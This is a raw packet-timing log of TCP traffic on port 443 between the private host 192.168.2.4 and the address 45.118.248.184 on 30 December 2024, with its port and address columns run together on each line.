                                                                                                                                                                                Dec 30, 2024 19:45:57.117877960 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.123672009 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.123692989 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.123724937 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.123733997 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.123745918 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.124145985 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.124157906 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.124206066 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.124211073 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.124233961 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.124243021 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.124263048 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.124296904 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.124301910 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.124330997 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.125036955 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.125052929 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.125098944 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.125104904 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.125128031 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.193460941 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.193483114 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.193634033 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.193634033 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.193640947 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.193722963 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.193737984 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.193777084 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.193783998 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.193814039 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.204056978 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.204076052 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.204118013 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.204123020 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.204133034 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.204145908 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.204283953 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.204283953 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.204283953 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.204293966 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.210021019 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.210042953 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.210088015 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.210093975 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.210118055 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.210467100 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.210479975 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.210520983 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.210525990 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.210553885 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.210737944 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.210757971 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.210793972 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.210798979 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.210822105 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.211275101 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.211289883 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.211349964 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.211355925 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.211385012 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.279812098 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.279831886 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.279900074 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.279907942 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.279934883 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.280101061 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.280116081 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.280162096 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.280167103 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.280191898 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.290213108 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.290239096 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.290272951 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.290282011 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.290441990 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.290462017 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.290476084 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.290518999 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.290525913 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.290556908 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.296300888 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.296319962 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.296374083 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.296380043 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.296410084 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.296689987 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.296703100 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.296760082 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.296766043 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.296844959 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.297075987 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.297095060 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.297130108 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.297135115 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.297158957 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.297722101 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.297735929 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.297775030 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.297780037 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.297792912 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.346961975 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.366281033 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.366297960 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.366350889 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.366355896 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.366381884 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.366399050 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.366405964 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.366410017 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.366437912 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.366457939 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.366465092 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.366492987 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.366506100 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.376490116 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.376533031 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.376595020 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.376600027 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.376651049 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.376734972 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.376754045 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.376811028 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.376816988 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.378364086 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.382699966 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.382714987 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.382772923 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.382777929 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.382812977 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.382828951 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.383121014 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.383136988 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.383177042 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.383181095 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.383208036 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.383224964 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.383260965 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.383277893 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.383322954 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.383326054 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.383349895 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.383359909 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.383995056 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.384010077 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.384049892 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.384056091 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.384083033 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.384099007 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.452558994 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.452578068 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.452758074 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.452771902 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.452817917 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.452853918 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.452872992 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.452918053 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.452924013 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.452955961 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.452975035 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.462882042 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.462902069 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.462969065 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.462976933 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.463033915 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.463053942 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.463231087 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.463231087 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.463238001 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.466954947 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.468980074 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.468996048 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.469038010 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.469044924 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.469058037 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.469084024 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.469300985 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.469321012 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.469357014 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.469362974 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.469388962 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.469682932 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.469702005 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.469736099 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.469742060 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.469764948 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.469784021 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.470276117 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.470292091 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.470328093 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.470334053 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.470355034 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.470364094 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.539057016 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.539073944 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.539119959 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.539130926 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.539143085 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.539180994 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.539217949 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.549190998 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.549205065 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.549252987 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.549258947 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.549417019 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.549418926 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.549437046 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.549470901 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.549477100 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.549504042 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.555480957 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.555495977 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.555540085 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.555545092 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.555557013 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.555769920 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.555788994 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.555824995 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.555830956 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.555844069 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.555999994 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.556013107 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.556054115 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.556060076 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.556070089 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.556545973 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.556562901 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.556595087 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.556601048 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.556619883 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.625271082 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.625289917 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.625399113 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.625399113 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.625407934 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.625716925 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.625744104 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.625786066 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.625792027 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.625807047 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.635433912 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.635451078 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.635519028 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.635535002 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.641535997 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.641554117 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.641714096 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.641721964 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.641781092 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.641794920 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.641834974 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.641840935 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.641853094 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.641987085 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.642004967 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.642040014 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.642047882 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.642059088 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.642254114 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.642268896 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.642304897 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.642311096 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.642321110 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.642844915 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.642863989 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.642898083 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.642904043 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.642920017 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.711833954 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.711853027 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.711935043 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.711958885 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.721569061 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.721587896 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.721638918 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.721645117 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.721710920 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.721725941 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.721817970 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.721817970 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.721817970 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.721828938 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.727763891 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.727782011 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.727834940 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.727844000 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.727859974 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.727973938 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.727987051 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.728040934 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.728049040 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.728254080 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.728270054 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.728331089 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.728338003 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.728688002 CET4435007645.118.248.184192.168.2.4
